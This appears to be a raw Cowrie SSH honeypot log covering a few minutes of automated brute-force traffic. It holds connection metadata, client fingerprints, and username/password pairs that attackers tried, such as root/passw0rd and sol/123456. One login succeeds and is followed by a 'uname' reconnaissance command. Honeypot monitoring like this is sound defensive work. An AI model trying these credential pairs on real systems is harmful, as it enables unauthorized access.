{"eventid":"cowrie.session.connect","src_ip":"155.248.164.42","src_port":56850,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa41b135e889","protocol":"ssh","message":"New connection: 155.248.164.42:56850 (1.2.3.4:22) [session: fa41b135e889]","sensor":"my-vps","timestamp":"2025-08-28T00:00:08.181028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T00:00:08.182504Z","src_ip":"155.248.164.42","session":"fa41b135e889"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T00:00:08.508312Z","src_ip":"155.248.164.42","session":"fa41b135e889"}
{"eventid":"cowrie.login.failed","username":"orange","password":"orange","message":"login attempt [orange/orange] failed","sensor":"my-vps","timestamp":"2025-08-28T00:00:09.389366Z","src_ip":"155.248.164.42","session":"fa41b135e889"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:00:10.624739Z","src_ip":"155.248.164.42","session":"fa41b135e889"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37722,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f5f57eda7a6","protocol":"ssh","message":"New connection: 194.233.79.134:37722 (1.2.3.4:22) [session: 0f5f57eda7a6]","sensor":"my-vps","timestamp":"2025-08-28T00:00:47.068475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:00:47.154309Z","src_ip":"194.233.79.134","session":"0f5f57eda7a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:00:47.478580Z","src_ip":"194.233.79.134","session":"0f5f57eda7a6"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:00:50.277864Z","src_ip":"194.233.79.134","session":"0f5f57eda7a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:00:50.712613Z","src_ip":"194.233.79.134","session":"0f5f57eda7a6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T00:00:50.713316Z","src_ip":"194.233.79.134","session":"0f5f57eda7a6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:00:50.939840Z","src_ip":"194.233.79.134","session":"0f5f57eda7a6"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:00:50.941185Z","src_ip":"194.233.79.134","session":"0f5f57eda7a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57992,"dst_ip":"1.2.3.4","dst_port":22,"session":"75ba0119721d","protocol":"ssh","message":"New connection: 212.227.125.160:57992 (1.2.3.4:22) [session: 75ba0119721d]","sensor":"my-vps","timestamp":"2025-08-28T00:00:51.577921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:00:51.578730Z","src_ip":"212.227.125.160","session":"75ba0119721d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:00:51.638844Z","src_ip":"212.227.125.160","session":"75ba0119721d"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123456","message":"login attempt [sol/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:00:51.819097Z","src_ip":"212.227.125.160","session":"75ba0119721d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:00:52.880620Z","src_ip":"212.227.125.160","session":"75ba0119721d"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":50874,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab703820f8d7","protocol":"ssh","message":"New connection: 194.233.79.134:50874 (1.2.3.4:22) [session: ab703820f8d7]","sensor":"my-vps","timestamp":"2025-08-28T00:02:30.194331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:02:30.282208Z","src_ip":"194.233.79.134","session":"ab703820f8d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:02:30.472832Z","src_ip":"194.233.79.134","session":"ab703820f8d7"}
{"eventid":"cowrie.session.connect","src_ip":"65.49.1.192","src_port":16214,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd0d75985f3f","protocol":"ssh","message":"New connection: 65.49.1.192:16214 (1.2.3.4:22) [session: cd0d75985f3f]","sensor":"my-vps","timestamp":"2025-08-28T00:02:32.121326Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003`\\x92\\x8c\\x9b\u0016nV\\xd91\\xe6k\\xbal\\xa8\\xe8\t\\xf8K\u0242\\xcc6\\xe5\\xbf\\xc6\u0015\\xaf\\x96\\x99\\xc8A\\xa9\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003`\\x92\\x8c\\x9b\u0016nV\\xd91\\xe6k\\xbal\\xa8\\xe8\t\\xf8K\u0242\\xcc6\\xe5\\xbf\\xc6\u0015\\xaf\\x96\\x99\\xc8A\\xa9\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T00:02:32.122558Z","src_ip":"65.49.1.192","session":"cd0d75985f3f"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:02:32.123666Z","src_ip":"65.49.1.192","session":"cd0d75985f3f"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-28T00:02:33.559758Z","src_ip":"194.233.79.134","session":"ab703820f8d7"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:02:34.725926Z","src_ip":"194.233.79.134","session":"ab703820f8d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53178,"dst_ip":"1.2.3.4","dst_port":22,"session":"62b297ca9748","protocol":"ssh","message":"New connection: 212.227.125.160:53178 (1.2.3.4:22) [session: 62b297ca9748]","sensor":"my-vps","timestamp":"2025-08-28T00:03:08.134722Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u0018\u0017\u0014\\xf9sC\\xe0\b\\x94\u075e\\xf8\\x96\\xa7\\x8a\\x8e\u0003\\xa8\\xce\\xe2\\x99\\xf1\\xfd\\x84\\xc5\u007f-\\xc3\u0016\u0000\\xc4v\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\u0018\u0017\u0014\\xf9sC\\xe0\b\\x94\u075e\\xf8\\x96\\xa7\\x8a\\x8e\u0003\\xa8\\xce\\xe2\\x99\\xf1\\xfd\\x84\\xc5\u007f-\\xc3\u0016\u0000\\xc4v\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T00:03:08.135780Z","src_ip":"212.227.125.160","session":"62b297ca9748"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:03:08.136568Z","src_ip":"212.227.125.160","session":"62b297ca9748"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":40564,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffc2c817d2f2","protocol":"ssh","message":"New connection: 194.233.79.134:40564 (1.2.3.4:22) [session: ffc2c817d2f2]","sensor":"my-vps","timestamp":"2025-08-28T00:04:26.415539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:04:26.439166Z","src_ip":"194.233.79.134","session":"ffc2c817d2f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:04:26.577413Z","src_ip":"194.233.79.134","session":"ffc2c817d2f2"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T00:04:27.899744Z","src_ip":"194.233.79.134","session":"ffc2c817d2f2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:04:29.105316Z","src_ip":"194.233.79.134","session":"ffc2c817d2f2"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":53792,"dst_ip":"1.2.3.4","dst_port":22,"session":"faa4350f3915","protocol":"ssh","message":"New connection: 194.233.79.134:53792 (1.2.3.4:22) [session: faa4350f3915]","sensor":"my-vps","timestamp":"2025-08-28T00:05:58.590836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:05:58.591697Z","src_ip":"194.233.79.134","session":"faa4350f3915"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:05:59.253284Z","src_ip":"194.233.79.134","session":"faa4350f3915"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55368,"dst_ip":"1.2.3.4","dst_port":22,"session":"39e12aa78432","protocol":"ssh","message":"New connection: 217.72.205.35:55368 (1.2.3.4:22) [session: 39e12aa78432]","sensor":"my-vps","timestamp":"2025-08-28T00:05:59.706093Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:05:59.707876Z","src_ip":"217.72.205.35","session":"39e12aa78432"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T00:06:01.431056Z","src_ip":"194.233.79.134","session":"faa4350f3915"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:06:04.529550Z","src_ip":"194.233.79.134","session":"faa4350f3915"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"e97548dfa472","protocol":"ssh","message":"New connection: 212.227.235.229:65105 (1.2.3.4:22) [session: e97548dfa472]","sensor":"my-vps","timestamp":"2025-08-28T00:06:08.777644Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:06:08.886351Z","src_ip":"212.227.235.229","session":"e97548dfa472"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33606,"dst_ip":"1.2.3.4","dst_port":22,"session":"8071d5b11428","protocol":"ssh","message":"New connection: 212.227.125.160:33606 (1.2.3.4:22) [session: 8071d5b11428]","sensor":"my-vps","timestamp":"2025-08-28T00:07:24.527671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:07:24.528820Z","src_ip":"212.227.125.160","session":"8071d5b11428"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:07:24.587018Z","src_ip":"212.227.125.160","session":"8071d5b11428"}
{"eventid":"cowrie.login.failed","username":"sol","password":"12345","message":"login attempt [sol/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T00:07:24.825233Z","src_ip":"212.227.125.160","session":"8071d5b11428"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:07:25.886656Z","src_ip":"212.227.125.160","session":"8071d5b11428"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54886,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcee497f6a27","protocol":"ssh","message":"New connection: 194.233.79.134:54886 (1.2.3.4:22) [session: bcee497f6a27]","sensor":"my-vps","timestamp":"2025-08-28T00:07:39.484125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:07:40.009723Z","src_ip":"194.233.79.134","session":"bcee497f6a27"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:07:40.547374Z","src_ip":"194.233.79.134","session":"bcee497f6a27"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:07:41.951949Z","src_ip":"194.233.79.134","session":"bcee497f6a27"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:07:43.400217Z","src_ip":"194.233.79.134","session":"bcee497f6a27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49906,"dst_ip":"1.2.3.4","dst_port":22,"session":"e86a26ddb96b","protocol":"ssh","message":"New connection: 212.227.125.160:49906 (1.2.3.4:22) [session: e86a26ddb96b]","sensor":"my-vps","timestamp":"2025-08-28T00:08:43.973671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:08:43.974569Z","src_ip":"212.227.125.160","session":"e86a26ddb96b"}
